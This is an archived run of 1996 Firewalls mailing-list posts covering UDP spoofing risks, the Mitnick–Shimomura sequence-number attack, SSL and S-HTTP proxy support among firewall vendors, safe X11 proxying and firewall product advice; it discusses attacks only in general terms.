Firewalls@GreatCircle.COM; Wed, 10 Jan 1996 21:36:06 -0500 From: "Marcus J. Ranum" Message-Id: <199601110236.VAA09986@switchblade.v-one.com> Subject: Re: Firewalls-Digest V5 #14 To: Firewalls@GreatCircle.COM Date: Wed, 10 Jan 1996 21:36:05 -0500 (EST) In-Reply-To: <199601110004.QAA14210@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 10, 96 04:04:10 pm Reply-To: mjr@switchblade.v-one.com Organization: V-One Corporation, Baltimore, MD Office URL: Mjr's page Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steven K. Sharp writes: >Please forgive me if this is a stupid question, but why is UDP such a bad >thing? Especially things like RealAudio, this uses UDP to communicate (as >do many other programs). What security risk does UDP pose? UDP in itself isn't a lot of a security risk. Indeed, you can trivially build highly secure protocols that run atop of UDP. The problem is that most writers of UDP-based protocols don't. :) Of course, the same may be said of writers of TCP-based protocols. :( The whole "UDP is evil" thing came about because it's a whole lot easier to spoof UDP traffic than it is TCP traffic. The thing that a lot of people (myself included!) didn't take into account was that "a whole lot harder" doesn't mean much when you're dealing with an attacker who has time on his hands. The TCP protocol is stateful - packets arrive neatly checksummed and sequenced (or at least with sequencing information) and only start to flow back and forth after a virtual connection negotiation protocol is successfully completed. UDP datagrams are simply spat at the recipient who has the choice of accepting them or not. To spoof a UDP packet probably takes 40 lines of C code. To spoof a TCP session probably takes 200, and a couple of systems in the right place, and a misconfigured router. So, a lot of security dweebs (myself included!) deal with UDP by putting a bullet through it, and kicking some sand over the corpse. To make matters worse a lot of UDP applications (most notably Sun RPC, and RealAudio) run on arbitrary ports, which makes them even harder to sensibly track. A lot of folks are comfortable letting UDP port 53 (DNS) into their firewalls. DNS is pretty well-known and well-behaved. Not so RPC. So - it's not that UDP is bad. It's more accurate to say that most of the UDP applications are bad, and we tend to tar the protocol with the same brush. An authenticated UDP-based datagram service would be a fine thing I'd have no problem letting through a firewall. RealAudio, to take (or make) an example, is one of those naughty UDP apps. It assumes that it can talk to arbitrary machines in your network on any of an arbitrary set of ports. Or it won't work. Brilliant design. The way to let it through the firewall is to open a hole for those port ranges. What happens to your network if there is some other service on those ports is your problem, not RealAudio's. :( My feeling, after wrestling with all these mis-designed protocols, is "bad protocols: just say 'no'" ...and then there's the Web. mjr. ---- Chief Scientist, V-ONE Corporation work http://www.v-one.com personal http://www.clark.net/pub/mjr/mjr-top.html From firewalls-owner Wed Jan 10 19:39:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19154 for firewalls-outgoing; Wed, 10 Jan 1996 18:36:45 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA19141 for ; Wed, 10 Jan 1996 18:36:38 -0800 (PST) Received: from pm1-30.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA03286; Wed, 10 Jan 96 21:35:39 -0500 Date: Wed, 10 Jan 96 21:35:39 -0500 Message-Id: <9601110235.AA03286@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Scott Rickard: >Date: Tuesday, January 09, 1996 9:56PM >Brain21 writes: > >>I would like to know this... if Shimomura is so good (an I actually >>believe that he may be) then why did he leave the r-utils enabled? Why >>did he not use TCPWrappers to prevent spoofing? Why did he allow people >>to see inside his network (Mitnick saw that there was a machine >>"X-something" that he believed was trusted by Shimomura's machine)? >Snip >>Just wondering why... > >The answer is quite clear if you have spook world experience and > identify with several key elements quoted in Frank Willoughby's > re-post of the Cypherpunks mailing list message regarding extracts > from Jonathan Littman's book "The Fugitive Game: Online With Kevin Mitnick," > >Scott Rickard >Senior IT Engineering Consultant >Scott_Rickard@mc.xerox.com Sorry, but I'm not much for conspiracy theories (unless we're talking about corporate politics). 8^) Personally, I think there is an easier explanation without having to reach for a conspiracy theory. I could take a couple of guesses what went wrong, but they would hold no more water than any other theories. In defense of Shimomura (who isn't here to defend himself), I'll stick to what I've heard that it wasn't anything he had any choice over. There are three advantages to this: 1) It gives Tsutomu Shimomura the benefit of a doubt. (Since we don't have all of the facts, I think he deserves the benefit of a doubt). 2) It provides a ready explanation for a person of his caliber having his system compromised. 3) It happens in real life - frequently. I've seen situations in many companies where a manager who was essentially clueless about security ordered the security person to lower their guard for a special high- priority project (are there really any other kind?) which had a (wildly) unrealistic deadline - usually as a result of poor planning. Sometimes you get lucky, sometimes you don't. Shimomura didn't. FWIW, a frequent scenario that plagues many Information Security Officers is when Project Managers plan everything down to the nth detail and somehow don't think of Information Security until they are ready to go live or the deadline is only a few days away (and then only when you gently remind them). (By then, it is usually too late to do anything except get extremely creative in your ability to design work-arounds & pull rabbits out of the hat & saving the day at the last minute.) At this point, it depends on how quickly the Information Security Officer can educate the Project Manager (or a couple of his higher-up managers) about the security risks of what is about to transpire and the probable risk to the Corporation (measured in dollars, manpower, equipment, etc.). Having said this, the Information Security Officer will then cross his fingers for luck, say a little prayer, and hope that the Corporate powers-to-be see the wisdom of his logic and won't allow the proposed security risk to happen. If things go well, the risk doesn't happen. If it does, then life suddenly gets very interesting and you have Carte Blanche for all the overtime you could ever dream of. 8^) As for me, I suspect the above scenario is more likely than a conspiracy theory. However, since none of us has access to the facts & Shimomura isn't here to clear the air, your theories are just as valid as mine. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Wed Jan 10 19:43:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA20030 for firewalls-outgoing; Wed, 10 Jan 1996 18:58:23 -0800 (PST) Received: from us.checkpoint.com (us.checkpoint.com [206.86.35.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA20023 for ; Wed, 10 Jan 1996 18:58:19 -0800 (PST) Received: from gil.us.checkpoint.com (latte) by us.checkpoint.com (5.x/SMI-SVR4) id AA15069; Wed, 10 Jan 1996 18:58:08 -0800 Date: Wed, 10 Jan 1996 18:58:08 -0800 Message-Id: <9601110258.AA15069@ us.checkpoint.com> X-Sender: emily@us.checkpoint.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Emily Cohen Subject: Re: SSL and S-HTTP Proxy support Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Bill Husler >Date: Fri, 5 Jan 1996 20:46:16 -0800 >Subject: Re: SSL and S-HTTP Proxy support > >>From: Brian W. McKenney, mckenney@smiley.mitre.org >> >>I would like to have an update as to which commercial firewall vendors >>support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >>a summary. >> >>This is the information that I have: >> >>1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. >>2. KarlBridge/KarlBrouter: S-HTTP proxy >>3. Milkyway Blackhole: S--HTTP >>4. SOS Brimstone: S-HTTP proxy >>5. Technologic Interceptor: S-HTTP proxy >>6. V-One SmartWall: S-HTTP proxy >> >>License versions of TIS Gauntlet will support whatever the next Gauntlet >>release supports. >> >You can add ANS Interlock to you list. >Bill > You can also add CheckPoint FireWall-1 to your list. We support both S-HTTP and SSL through our stateful inspection architecture. /emily From firewalls-owner Wed Jan 10 19:58:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA20858 for firewalls-outgoing; Wed, 10 Jan 1996 19:16:34 -0800 (PST) Received: from quito.CS.Berkeley.EDU (quito.CS.Berkeley.EDU [128.32.43.69]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA20853 for ; Wed, 10 Jan 1996 19:16:22 -0800 (PST) Received: (from daw@localhost) by quito.CS.Berkeley.EDU (8.6.11/8.6.9) id TAA26648 for firewalls@greatcircle.com; Wed, 10 Jan 1996 19:15:23 -0800 From: David A Wagner Message-Id: <199601110315.TAA26648@quito.CS.Berkeley.EDU> Subject: safe X windows proxy To: firewalls@greatcircle.com Date: Wed, 10 Jan 1996 19:15:22 -0800 (PST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm seeking a safe X windows proxy which will filter out dangerous X11 protocol requests from the outside, so I can use X across a firewall. The idea is simple: I want to be able to pop up a window on my (internal) X server, where the window is controlled by a X client on the external network. I don't want the outside client to be able to issue any dangerous requests -- I don't trust it. (For example, the external client shouldn't be able to grab key strokes typed into other windows.) A simple forwarder which blindly passes on all X traffic is not what I'm looking for -- I've seen x-gw and xforward, and I can't use them, since they don't do any filtering. I searched the firewalls archives diligently: no joy. (Hope this isn't a FAQ!) I read about a safe X proxy in the USENIX '95 Security Symposium proceedings; this Xgate thing sounded like exactly what I'm looking for, but I haven't been able to find source or contact the author (Brian Kahn). Any clues? Xnest looks vaguely interesting, but I'm not sure it's secure. Comments? Are there any other possibilities? Many thanks for any info you can offer! -- Dave Wagner daw@cs.berkeley.edu From firewalls-owner Wed Jan 10 20:13:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19588 for firewalls-outgoing; Wed, 10 Jan 1996 18:45:50 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA19583 for ; Wed, 10 Jan 1996 18:45:40 -0800 (PST) Received: from pm1-30.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA03626; Wed, 10 Jan 96 21:44:44 -0500 Date: Wed, 10 Jan 96 21:44:44 -0500 Message-Id: <9601110244.AA03626@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: I cannot read your mail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Wang, Qin: >JOSE LUIS VERDEGUER NAVARRO, > >I have received 3 pieces of your mails since yesterday, but they have only the >mail header. So I cannot read the contents and I do not know why. I use cc:Mail >and I suppose it's due to MIME or something else. > >In your mail header, >> Mime-Version: 1.0 >> Content-Type: TEXT/PLAIN; CHARSET=US=ASCII > >I do not know if the others you send mail to can read the contents > >Regards, > >Wang, Qin I think he is using one of those "transparent proxies" in his firewall. These can sometimes cause the characters in the mail to assume the same color as the background - making them transparent. Fortunately, I have an opaque proxy and the text is converted back. Not bad postings acutally. 8^) 8^) 8^) All kidding aside. The same thing happened to me. I sent him a brief message telling him that his mails were arriving OK, but somehow his text didn't make the trip. Oh well. Hopefully he will get the problem fixed soon. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Wed Jan 10 20:43:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA21962 for firewalls-outgoing; Wed, 10 Jan 1996 19:40:57 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA21946 for ; Wed, 10 Jan 1996 19:40:44 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id WAA18554; Wed, 10 Jan 1996 22:38:47 -0500 Date: Wed, 10 Jan 1996 22:38:47 -0500 (EST) From: Brain21 To: Doug Hughes cc: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Doug Hughes wrote: > 2) the spoofing attack had not become common knowledge and widespread use > until this series of attacks was demonstrated. Papers had been around > for years on the potential for this, but, as I recall, until this time, > there weren't any hacker tools that were widely known about for exploiting. I agree, but the possibility is always there. If you are in the security business, then it pays to protect against everything possible, and not to underestimate your "adversaries." > Remember, (Not that this means anything but), the CERT advisory wasn't > published until 1/23 95 and the attacks took place over Xmas of '94. > To the best of my recollection, the sequence number randomizing (which > is MUCH harder to implement than the router rules that prevent spoofing) > wasn't available until January of '95 either. > Now, CERT is usually slow about announcing such things, but, the patch > was relatively simple to implement in a router, so, you'd think that > not long after they heard about it, it would be posted. Even the sites That doesn't necessarily mean anything. I've seen advisories come out from cert WELL after other advisories have come out on other mailing lists, with patches and everything. I think my point is that Shimomura should not have underestimated Mitnick or anyone, especially since he KNEW that it was possible. Overconfidence? I don't know. Maybe Shimomura didn't even set up the security there and trusted it? I don't know. I just find it kinda ironic. Brain21 From firewalls-owner Wed Jan 10 20:58:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA22538 for firewalls-outgoing; Wed, 10 Jan 1996 19:55:36 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA22533 for ; Wed, 10 Jan 1996 19:55:31 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id WAA18582; Wed, 10 Jan 1996 22:53:30 -0500 Date: Wed, 10 Jan 1996 22:53:30 -0500 (EST) From: Brain21 To: Mike Shaver cc: frankw@in.net, firewalls@GreatCircle.COM, jya@pipeline.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <199601101730.MAA13228@neon.ingenia.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Mike Shaver wrote: > Thus spake Brain21: > > I would like to know this... if Shimomura is so good (an I actually > > believe that he may be) then why did he leave the r-utils enabled? > > Convenience, I would guess. > Allowing access without passwords, I don't know. That's what I figured. Maybe a little carelessness? I would not be surprised if many of the security experts out there worked on less secure machines than what they set up for their clients. Hell, my father used to do top secret work for the Dept. of Defense (he neede "Q" clearance, and needs higher now) and the office where he worked communicated to it's other offices over the net. They used netcom. Not too terribly secure if you ask me. They did not use encryption. > > How do they prevent spoofing? They check IP address (and some DNS > stuff not related to IP-level spoofing) for "identification" the same Yes, my mistake (been told so many times now, as you can imagine), my mistake. > > Do you mean "why did he allow packets to reach machines on his > network"? Internet connectivity would seem a good reason. If I recall correctly (and I may not) Mitnick fingered the machines. IF so, why was it allowed? Why were the probes inside allowed at all? On big university machines, I can see, but you don't need to allow it for EVERY department. And you don't need to sacrifice a net connection either. > > > I believe that Shimomura knew of the possibility of this type of > > attack WAY ahead of time (like months or years). > > There was a paper published by (I believe) Steve Bellovin in (I > believe) the mid-80s that discussed this type of attack. Nothing new > here... > Late '80's and Shimomura knew about it by at least 90 or 91. The attack happened in (late) 94. From firewalls-owner Wed Jan 10 21:13:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24117 for firewalls-outgoing; Wed, 10 Jan 1996 20:20:52 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA24095 for ; Wed, 10 Jan 1996 20:20:46 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id XAA18642; Wed, 10 Jan 1996 23:05:33 -0500 Date: Wed, 10 Jan 1996 23:05:33 -0500 (EST) From: Brain21 To: scott_rickard@mc.xerox.com cc: firewalls@greatcircle.com Subject: Re: your mail Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't buy it. First off, the CIA wouldn't be involved (well, ok, at least not legally...). The is mainly the SS's territory, and the FBI sometimes gets onvolved as well. I doubt that it was a serious enough thing that hte NSA would get involved too. Let's assume that the CIA or NSA *were* involved via Shimomura, as you have implied may be a possibility. I doubt the Shimomura would have given such detailed account of the attacks so quickly. I would be more characteristic to keep it a little quiet, don't you think? It just does not sit well with me at all. BTW, did cypherpunks mention anything about how Mitnick got root on toad.com to do the spoofing? That's where Shimomura said the initial probes came from... Brain21 From firewalls-owner Wed Jan 10 21:28:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23330 for firewalls-outgoing; Wed, 10 Jan 1996 20:10:08 -0800 (PST) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA23324 for ; Wed, 10 Jan 1996 20:09:55 -0800 (PST) From: mail06823@pop.net Received: from alterdial.UU.NET by relay3.UU.NET with SMTP id QQzxzs23004; Wed, 10 Jan 1996 23:08:58 -0500 (EST) Received: from 205.230.245.90 by alterdial.UU.NET with SMTP id QQzxzs23914; Wed, 10 Jan 1996 23:08:50 -0500 Date: Wed, 10 Jan 1996 23:08:50 -0500 Message-Id: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Subject: Survey on Dangers of SNMP / Respond with your 2 cents on the survey To: firewalls@greatcircle.com X-Mailer: SPRY Mail Version: 04.00.06.17 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I would appreciate it if you can take a moment to respond to my email address (not the whole list) to "vote" on if you think SNMP traffic should pass through a Firewall. Your response should be simple (Yes, No, Maybe based on a condition), or better still, please share your stories and experiences on the dangers. I understand that SNMP is great for management, but I do not want to jeopardize my company so that I can get tons of management information that I may not need (I would argue that paring down services and allowing the Firewall architecture to do it's job may be a viable alternative). I do not have a requirement to use my existing Enterprise Network Management system. Thanks for your responses, and I will post a synopsis when I receive enough results to be meaningful. Thanks. From firewalls-owner Wed Jan 10 22:28:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA27245 for firewalls-outgoing; Wed, 10 Jan 1996 21:09:14 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA27228 for ; Wed, 10 Jan 1996 21:08:59 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id QAA08009 for ; Thu, 11 Jan 1996 16:05:48 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id QAA01893 for firewalls@greatcircle.com; Thu, 11 Jan 1996 16:08:29 +1100 From: Jas (Matthew K) Message-Id: <199601110508.QAA01893@maverick.itd.uts.edu.au> Subject: Re: Firewalls-Digest V5 #14 To: firewalls@greatcircle.com (Firewalls Mailing List) Date: Thu, 11 Jan 1996 16:08:28 +1100 (EST) In-Reply-To: <199601110236.VAA09986@switchblade.v-one.com> from "Marcus J. Ranum" at Jan 10, 96 09:36:05 pm X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus J. Ranum wrote this... > To make matters worse a lot of UDP applications (most > notably Sun RPC, and RealAudio) run on arbitrary ports, which > makes them even harder to sensibly track. A lot of folks are > comfortable letting UDP port 53 (DNS) into their firewalls. > DNS is pretty well-known and well-behaved. Not so RPC. well the client controls what protocol to connect with RPC (on the proviso that the server offers that protocol). almost all SunRPC programs that are compiled for use of IP offer both TCP and UDP (you have to go out of your way to stop TCP from working). some Sun offered RPC servers will only offer UDP, but most will offer both. and another beside, you cant pump more than 8Kb per request using UDP, so most RPC programs that pump large amounts of data will always be TCP. i have programmed in RPC for a number of years now, and i always use TCP for my RPC work. Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Administrator Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Wed Jan 10 23:28:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA06194 for firewalls-outgoing; Wed, 10 Jan 1996 23:12:09 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA06178 for ; Wed, 10 Jan 1996 23:12:02 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id CAA16906; Thu, 11 Jan 1996 02:01:20 -0500 Date: Thu, 11 Jan 1996 02:01:02 -0500 (EST) From: Rabid Wombat To: RDA cc: firewalls@GreatCircle.COM Subject: RE: firewalls reviews/comparisons In-Reply-To: <9600108212.AA821296054@etf.etf.it> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, RDA wrote: > > ______________________________ Forward Header __________________________________ > Subject: RE: firewalls reviews/comparisons > Author: Neil at INTERNET > Date: 1/9/96 3:41 PM > > > > >> 2) I've been searching for information on the best firewall to purchase > >for > our > >> needs and have not come across any reviews/comparisons on which is > >> best (I have a list of all of the firewalls available and their > >descriptions > but > >> not any comparisons). Anyone know of any reviews and where to find > >them? > We require a firewall which would could support a very high > >throughput so > we would probably require a hardware-based firewall. > >Configuring our > >> front-end router to act as a firewall isn't a practical option. > >Any > information would be > >> appreciated. Thanks, > > >There was a review of commercial firewalls in (I think) Byte or something > >like that a little while ago, the machines being the TIS Gauntlet, Border > >Ware and Firewall 1. Perhaps someone with a better memory than me can > >clarify. > > >> Brian Hescock > >> hescockb@86aw4.ramstein.af.mil > > Hello, just for info, the Byte issue mentioned is from April '95 under the > 'Network security' section. As a newbie myself, I found it quite useful. > > I'm hoping to set up a firewall based on NT 3.51 which will also act as > a WWW proxy. Does anyone have any inside info on the expected > release/functionalities of the Microsoft Catapult package ? Since most > of the clients on the net I need to protect are running IPX (some run > both IPX and TCP/IP), I would like to know the opinion of the experts on > the possibility of a Web proxy machine also doing a 'protocol > conversion'. i.e. surely it's theoretically possible for the WWW clients > on the protected net to connect to the proxy over IPX (or Netbeui) and > for the proxy to go out of a second card on TCP/IP to the Internet ??? > I would imagine that blocking all TCP/IP through the firewall in this > way would go a long way to protecting sensitive UNIX hosts on the > inside. Has this been done before ? Am I seriously misguided ? Thanks > for any opinions. You might want to look into the Firefox Novix gateway. It converts IPX/SPX to TCP/IP, and can allocate IP addresses on a dynamic or static basis. It runs on Novell fileservers, which I assume you have, since you're running IPX. It also runs on Novell's MPR if you don't want to impact your servers. I don't know if they have an NT version - I haven't been keeping close tabs on them. Phone number is 800-230-6090/408-321-8344 or info@firefox.com. (I have no commercial interest in this company) - Wombat > > Richard Anstey. > > > ============================================================================= > ======== E-mail messages from the European Training Foundation ========= > ======== shall not in any way be legally binding. ========= > ============================================================================= > From firewalls-owner Wed Jan 10 23:43:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA07125 for firewalls-outgoing; Wed, 10 Jan 1996 23:42:08 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA07120 for ; Wed, 10 Jan 1996 23:42:04 -0800 (PST) Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA07116; Thu, 11 Jan 1996 01:30:14 -0600 Date: Thu, 11 Jan 1996 01:30:14 -0600 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9601110730.AA07116@hosaka.smallworks.com> To: dannyc@gmap.leeds.ac.uk, firewalls@GreatCircle.COM Subject: Re: Firewall design - routers and commercial kit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Seems to me the obvious way (sort of) to do this is to use a screened subnet >arrangement. Ok .. fine. Am I duplicating kit doing this ? That is, by using >an exterior and interior router to create a screened net off which would hang >the commercial firewall etc, am I duplicating the routing function of the >commercial firewall or don't they have the same level of control over routing >as a CISCO would for example ? Some firewalls do. (NetGate and Firewall-1 do.) Actually, you can get better control with some of these than you can with a Cisco. For instance, you can't filter on ICMP type and code with Cisco's access lists... Jim From firewalls-owner Thu Jan 11 02:12:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA12141 for firewalls-outgoing; Thu, 11 Jan 1996 01:50:24 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA12136 for ; Thu, 11 Jan 1996 01:50:17 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199601110950.BAA12136@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 0781; Thu, 11 Jan 96 04:48:27 EST Date: Thu, 11 Jan 1996 04:48:00 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: RE: MITNICK & THE TCP SEQUENCE NUMBER ATTACK ON SHIMOMURA (L Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Scott Rickard wrote >>Globally, the intelligence and counterintelligence businesses are a multi-trillion dollar industry I think this is somewhat of an over exaggeration, certainly for the UK where the latest figures put intelligence spending at around 1% of Government spending, i.e. less than 0.5% of the GNP (which is around L700 billion) As an interesting aside, this figure has not gone down despite the advent of 'peace' in N. Ireland. Mark. From firewalls-owner Thu Jan 11 02:16:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA12374 for firewalls-outgoing; Thu, 11 Jan 1996 01:56:22 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA12369 for ; Thu, 11 Jan 1996 01:56:13 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id UAA04358; Thu, 11 Jan 1996 20:25:10 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA27779; Thu, 11 Jan 1996 20:25:05 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <9601110955.AA27779@bunya.awadi> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: brain21@montag33.residence.gatech.edu (Brain21) Date: Thu, 11 Jan 1996 20:25:04 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Brain21" at Jan 10, 96 10:53:30 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Brain21: > >Hell, my father used >to do top secret work for the Dept. of Defense (he neede "Q" clearance, >and needs higher now) and the office where he worked communicated to it's >other offices over the net. They used netcom. Not too terribly secure >if you ask me. They did not use encryption. > Ummmm I suspect that things may be a bit different to that which you have implied. Even in an organisation handling secret material a lot of the day to day running of the place is not classified - you know, things like when the next barbeque (or cook-out or whatever word you guys use for the process of carbonising meat over a flame outdoors whilst getting drunk.... :*) will be or getting someone to order more pens for the stationery cabinet - such things are not and should not be classified. I bet all the secret documents/matters were not sent over the net (though I could be wrong....) - it is certainly the way things work here. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Thu Jan 11 02:59:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA14390 for firewalls-outgoing; Thu, 11 Jan 1996 02:45:50 -0800 (PST) Received: from archimedes.vislab.navy.mil (archimedes.chinalake.navy.mil [129.131.31.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA14385 for ; Thu, 11 Jan 1996 02:45:40 -0800 (PST) Received: from archimedes.vislab.navy.mil (parcival.vislab.navy.mil [129.131.31.12]) by archimedes.vislab.navy.mil (current-1701B/current-CL-CL) with ESMTP id CAA18112 for ; Thu, 11 Jan 1996 02:46:21 -0800 Posted-Date: Thu, 11 Jan 1996 02:46:21 -0800 Message-Id: 